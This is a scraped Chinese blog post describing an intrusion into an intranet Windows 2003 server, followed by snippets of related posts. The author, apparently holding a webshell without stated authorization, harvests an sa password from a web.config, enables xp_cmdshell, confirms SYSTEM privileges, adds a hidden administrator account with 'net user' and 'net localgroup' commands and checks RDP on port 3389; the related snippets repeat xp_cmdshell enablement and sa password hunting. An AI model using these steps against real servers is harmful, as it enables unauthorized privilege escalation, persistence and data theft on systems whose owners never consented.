sqlserver提权失败_MSSQL 入侵提权之内网渗透案例

最新推荐文章于 2022-12-22 00:31:02 发布
最新推荐文章于 2022-12-22 00:31:02 发布
阅读量262 收藏
点赞数
文章标签: sqlserver提权失败
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34312149/article/details/111925313
版权

描述:对于内网渗透技术一直感觉很神秘,手中正巧有一个webshell是内网服务器。借此机会练习下内网入侵渗透技术!本文敏感信息以屏蔽!密码都以*号代替。此次过程主要运用到xp_cmdshell恢复与执行,再通过自己的灵活思维运用。

环境:2003 SERVER

IIS :6.0 支持php

数据库:MSSQL和MYSQL

网站类型:ASPX

本 文重点讲述内网渗透提权部分,对于WEBSHELL不在描述。对于了解入侵渗透的朋友都知道,拿到webshell后服务器能否提权就要先找提权的漏洞所 在。从本站的角度来看,存在MSSQL、MYSQL支持ASPX和PHP可以说权限够大的了。先来看看目录能穷举出来哪些东西。先看程序目录,很平常么。 没现有SU和MYSQL之类的信息。

E:盘可以浏览

F:盘可以浏览

本站ASPX 类型网站,使用的是MSSQL数据库。显示密码不是最高权限的用户,就是是个DB用户提权也不能马上到手。

再翻翻别的站点,目录可以浏览一个个找吧。发现一个目录web.config有SA用户

连接数据库信息:

Source=gzzx;Initial Catalog=SMSCenter;Persist Security Info=True;User ID=sa;Password=****” 打开aspxspy,使用database连接功能。

登录成功,显示SA看来应该没有降权。

连接状态是MSSQL 2005,要先启xp_cmdshell.

接着执行下命令”whoami”

good,system 权限,下面就是添加一个账号了。。

Exec master.dbo.xp_cmdshell ‘net user admin **** /add’

Exec master.dbo.xp_cmdshell ‘net localgroup administrators admin /add’

再看下3389端口是否开启

Exec master.dbo.xp_cmdshell ‘netstat -ano’

OK,状态正常。

Exec master.dbo.xp_cmdshell ‘ipconfig /all’显示配置是内网IP

通过域名解析到的IP连接3389,可以连接。

说明管理做了端口映射,这就不要转发端口了。省了很多功夫!

这才拿到了一台服务器的权限,从网站的SQL连接上不难发现内网还有SQL服务器。

WeDeep微沉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
11.如无人之境——内网MSSQL服务器口令扫描及渗透
weixin_44023460的博客
01-02 400
11.1如无人之境——内网MSSQL服务器口令扫描及渗透 在实际渗透过程中,往往通过SQL注入或者弱口令登录后台,成功获取了Webshell,但对于如何进行内网渗透相当纠结,其实在获取入口权限的情况下,通过lcx端口转发等工具,进入内网,可以通过数据库、系统账号等口令扫描来实施内网渗透。本文就介绍如何在内网中进行MSSQL口令扫描及获取服务器权限。 11.1.1使用SQLPing扫描获取mssql口令 在SQLPing程序目录,配置好passlist.txt和userlist.txt文件,如图1所示,设置扫
JS-使用JS方法获取当前页面的URL(网址信息)
itsNekoDeng的博客
11-04 595
var url; url = window.location.href; /* 获取完整URL */ alert(url); /* http://127.0.0.1:8020/Test/index.html#testname=test */ url = window.location.pathname; /* 获取文件路径(文件地址) */ alert(url); /* /Test/index.html */ url = window.location.protocol; /* 获取协议 */ al
sqlserver提权失败_MsSQL数据库提权
weixin_35902800的博客
12-23 193
MsSQL数据库提权注:这是基于相关CISP-PTE的学习笔记总结的博客文章1.通过xp_cmdshell提权数据库:SQLServer2005新建查询,执行以下权限,exec为执行(execute)的简写,设置show advanced options为1时(默认为0),可使用sp_configure允许列出高级选项允许调用命令查询权限,已经是管理员权限添加用户youki,密码为youki使用c...
2021-06-01web渗透学习之SQLserver提权(mssql
qq_45290991的博客
06-01 244
我转了一篇个人觉得写得很好的博客,上一篇:2021-06-01sql提权 这一篇是月大佬的工具实战篇,csdn有人提供下载,我就不说了,直接上实战图片: 假设已经上传了大马,查找了这几个文件发现了sa用户的密码为123456: web.config config.asp conn.aspx database.aspx 登录(连接sql server) 执行cmd: ...
渗透综合靶场---SqlServer提权
最新发布
q
12-22 1071
再次查询是否开启3389端口,已开启就使用mstsc连接----exec xp_cmdshell'netstat -ant | find "3389"'查看目标是否开启3389端口----exec xp_cmdshell'netstat -ant | find "3389"'如何找到上传的文件所在目录,使用burp抓包点击文件,然后修改文件名,然后再放包,浏览器因为找不到文件会报错。扫描端口,知道目标ip,扫描目标ip开启了多少端口,(1-65535) 扫描出下面端口。
MsSql.zip_mssql_sqlserver_sqlserver 封装_zip
07-14
windows sqlserver 封装类接口
mssql,mysqll注入语法.zip_KMF_security_提权
09-24
标题“mssql,mysqll注入语法.zip_KMF_security_提权”表明这个压缩包文件主要关注的是SQL注入攻击相关的知识,特别是针对Microsoft SQL Server(mssql)和MySQL(通常拼写为mysql)数据库系统的安全问题。...
SQL Server降权运行 SQL Server 2000以GUESTS权限运行设置方法
09-10
SQL Server降权运行是数据库管理中的一个重要安全策略,旨在降低SQL Server服务的权限,从而减少潜在的安全风险。...尽管如此,理解并正确实施降权运行的概念仍然是保护SQL Server数据库的关键措施之一。
【红蓝对抗】SQL Server提权1
08-03
【红蓝对抗】SQL Server 提权1涉及到的是网络安全领域中的渗透测试技巧,特别是针对SQL Server数据库的权限提升方法。在渗透测试中,提权是关键步骤,因为高权限的账户能够访问更多的系统资源,揭示潜在的安全漏洞。...
SQL-gui.zip_SQLGuI_delphi mssql_mssql 工具_sql delphi
09-24
标签"sqlgui"表示这是SQL图形用户界面相关的,"delphi_mssql"表明该工具的开发语言是Delphi,并且专为MSSQL设计,"mssql_工具"强调它是一个MSSQL的辅助工具,"sql_delphi"则指出它是用Delphi编写的SQL处理工具。...
070-浅谈SQL Server从DBO用户提权到DBA的两种思路.pdf
09-20
070-浅谈SQL Server从DBO用户提权到DBA的两种思路.pdf
mssql数据库提权之——xp_cmdshell执行系统命令
01-19
条件 所谓利用数据进行提权,利用的其实是数据库的运行权限,所以只要我们满足以下条件即可进行提权: 1、 必须获得sa的账号密码或者与sa相同权限的账号密码,且mssql没有被降权。 2、 必须可以以某种方式执行sql语句,例如:webshell或者是1433端口的连接。 提权基本思路过程与原理 1.MSSQL在Windows server类的操作系统上,默认具有system权限。System权限在Windows server2003中权限仅比管理员小;而在2003以上的版本,则为最高权限。 2.获取webshell之后可尝试在服务器各个站点的目录寻找sa的密码(某些站点直接在web应用程序中使
MSSQL内网渗透案例分析
weixin_30322405的博客
11-12 185
主题:MSSQL内网渗透案例分析 发表:黑白前线 友情提交到t00ls.net 与某菜菜们分享注:附件太多了,就引用站上的图片吧。高手老鸟飘过!描述:对于内网渗透技术一直感觉很神秘,手中正巧有一个webshell是内网服务器。借此机会练习下内网入侵渗透技术!本文敏感信息以屏蔽!密码都以*号代替。此次过程主要运用到xp_cmdshell恢复与执行,再通过自己的灵活思维运用。 环境:2003 SER...
SQLserver提权
一个普普通通的博客
04-17 2919
SQLserver提权
sqlserver提权
YouthBelief的博客
12-19 1642
1.xp_cmdshell提权 默认在sqlserver2000中开启,2005后默认禁止,使用sp_configure重新打开它 sa权限下 使用xp_cmdshell可以 以system权限执行操作系统命令。 开启xp_cmdshell exec sp_configure 'show advanced options', 1; reconfigure; exec sp_configure 'xp_cmdshell',1; reconfigure; 关闭xp_cmdshell exec sp_confi
如何判断SQLServer服务器被入侵
dingdingshinie1008的博客
08-13 381
介绍两个查看SQLServer服务器是否被入侵的方法: 1、入侵入侵后一般会开服务器的3389,建立隐藏用户,然后登录。我们只要到C:\Documents and Settings这个目录下看看是否有可以的用户名就可以了,不管是不是隐藏的用户,都会在这里显示出来。 2、有些入侵者喜欢留一个有高权限的sqlserver数据库用户,当作后门,我们可以打开登陆sqlserver的查询分析器,...
[渗透测试篇]数据库系统渗透之Mssql提权
qq_43668710的博客
04-18 414
提上日程,月末之前完成
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值